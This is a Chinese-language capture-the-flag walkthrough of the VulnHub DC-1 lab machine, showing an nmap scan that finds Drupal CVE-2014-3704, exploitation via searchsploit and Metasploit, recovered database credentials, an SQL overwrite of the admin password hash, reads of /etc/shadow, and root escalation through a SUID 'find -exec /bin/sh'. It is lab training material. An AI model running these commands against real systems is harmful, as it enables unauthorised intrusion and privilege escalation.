vulnhub-DC:1 - Flag夺取记

下载地址https://download.vulnhub.com/dc/DC-1.zip

nmap -A -T4 10.10.10.132 --script=vuln


Nmap scan report for 10.10.10.132                                                                                                                                                                                 
Host is up (0.00034s latency).                                                                                                                                                                                    
Not shown: 997 closed ports                                                                                                                                                                                       
PORT    STATE SERVICE VERSION                                                                                                                                                                                     
22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)                                                                                                                                                
|_clamav-exec: ERROR: Script execution failed (use -d to debug)                                                                                                                                                   
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))                                                                                                                                                              
|_clamav-exec: ERROR: Script execution failed (use -d to debug)                                                                                                                                                   
| http-csrf:                                                                                                                                                                                                      
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.132                                                                                                                                      
|   Found the following possible CSRF vulnerabilities:                                                                                                                                                            
|                                                                                                                                                                                                                 
|     Path: http://10.10.10.132:80/                                                                                                                                                                               
|     Form id: user-login-form                                                                                                                                                                                    
|     Form action: /node?destination=node                                                                                                                                                                         
|                                                                                                                                                                                                                 
|     Path: http://10.10.10.132:80/user/register                                                                                                                                                                  
|     Form id: user-register-form                                                                                                                                                                                 
|     Form action: /user/register                                                                                                                                                                                 
|                                                                                                                                                                                                                 
|     Path: http://10.10.10.132:80/node?destination=node                                                                                                                                                          
|     Form id: user-login-form                                                                                                                                                                                    
|     Form action: /node?destination=node                                                                                                                                                                         
|                                                                                                                                                                                                                 
|     Path: http://10.10.10.132:80/user/password                                                                                                                                                                  
|     Form id: user-pass                                                                                                                                                                                          
|     Form action: /user/password                                                                                                                                                                                 
|                                                                                                                                                                                                                 
|     Path: http://10.10.10.132:80/user
|     Form id: user-login
|     Form action: /user
|     
|     Path: http://10.10.10.132:80/user/
|     Form id: user-login
|_    Form action: /user/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /rss.xml: RSS or Atom feed
|   /robots.txt: Robots file
|   /UPGRADE.txt: Drupal file
|   /INSTALL.txt: Drupal file
|   /INSTALL.mysql.txt: Drupal file
|   /INSTALL.pgsql.txt: Drupal file
|   /: Drupal version 7 
|   /README: Interesting, a readme.
|   /README.txt: Interesting, a readme.
|   /0/: Potentially interesting folder
|_  /user/: Potentially interesting folder
|_http-server-header: Apache/2.2.22 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2014-3704: 
|   VULNERABLE:
|   Drupal - pre Auth SQL Injection Vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-3704
|         The expandArguments function in the database abstraction API in
|         Drupal core 7.x before 7.32 does not properly construct prepared
|         statements, which allows remote attackers to conduct SQL injection
|         attacks via an array containing crafted keys.
|           
|     Disclosure date: 2014-10-15
|     References:
|       https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
|       http://www.securityfocus.com/bid/70595
|       https://www.drupal.org/SA-CORE-2014-005
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704
111/tcp open  rpcbind 2-4 (RPC #100000)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36912/udp   status
|   100024  1          37215/tcp6  status
|   100024  1          52947/udp6  status
|_  100024  1          54937/tcp   status
MAC Address: 00:0C:29:3D:43:A8 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.34 ms 10.10.10.132

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 530.45 seconds

通过返回结果看到存在CVE2014-3704
seachsploit搜索 -m参数可以把exp保存到当前位置
80765-nfd3vvitj.png

接着在msf上搜
68620-hec19sgupvi.png
07145-nfhrv9x1bh.png

漏洞利用getshell
16812-co6lbypat4.png

切换shell
cat flag1.txt
Every good CMS needs a config file - and so do you.

发现flag1
寻找drupal配置文件
drupal数据库配置文件默认在
/sites/default/settings.php
发现flag2

cat settings.php
<?php

/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

使用python获取交互shell查看当前权限

python -c '__import__("pty").spawn("/bin/bash")'
05016-o8c43o8qkc.png

可以看到是www权限
14308-2g8g0sv31ue.png

通过查看数据库

发现密码hash加盐,破解难度比较大,可以通过更新密码,或者利用其他方法
利用
74284-czkfq74svdv.png

update users set pass=‘$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4’ where name=‘admin';

`
update users set pass='$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4' where name='admin';`
然后用password登陆

之前通过seachsploit发现有个可以添加一个管理权限的脚本
26258-nslmlgnnxrc.png

把此脚本复制到当前目录下
48102-yqg0nl64ug.png
也可以登录到管理员
83629-p76hm3mxq5c.png
可直接添加有admin权限的账户
拿到第3个flag
17059-tmo7lz7ldne.png

查看提示

whoami
uname -a
cat /etc/passwd
cat /etc/shadow

91148-419w8dx4tdm.png
发现flag4在home目录下
58792-ee9vduj6ope.png
他让你使用root访问
接下来提权
通过flag3获取到提示的使用find -exec
搜索suid权限的程序

find / -user root -perm -4000 -print 2>/dev/null
find / -type f -perm -u=s 2>/dev/null

发现使用find有root权限
然后用find … - exec “…” 查找文件后并执行命令

find ./ -exec "whoami" \;
find ./ -exec "/bin/sh" \;

成功提到root权限
26406-er4u5jui1mg.png

成功拿到第五个flag
99661-4so0keb35hc.png

原创文章,作者:运营,如若转载,请注明出处:http://www.csxxaq.com/yc/814.html
【入门篇】PHP源代码审计
« 上一篇 05-21
关于黑产暗链的分析与看法
下一篇 » 05-21

相关推荐

红队防猝死手册

文章来源:https://github.com/zhutougg/RedteamStandard一切为了不丢分工作环境工作时全部操作均在虚拟机中完成虚拟机...

渗透某勒索服务器

这是 酒仙桥六号部队 的第 74 篇文章。全文共计1300个字,预计阅读时长5分钟。文章来源:六号刃部 - 酒仙桥六号部队 事情经过和我一起合租的室友喜欢...

Android渗透工具集合

Android安全测试更多地被安全行业用来测试Android应用程序中的漏洞。下面将列举全面的Android渗透测试工具和资源列表,其涵盖了在Andro...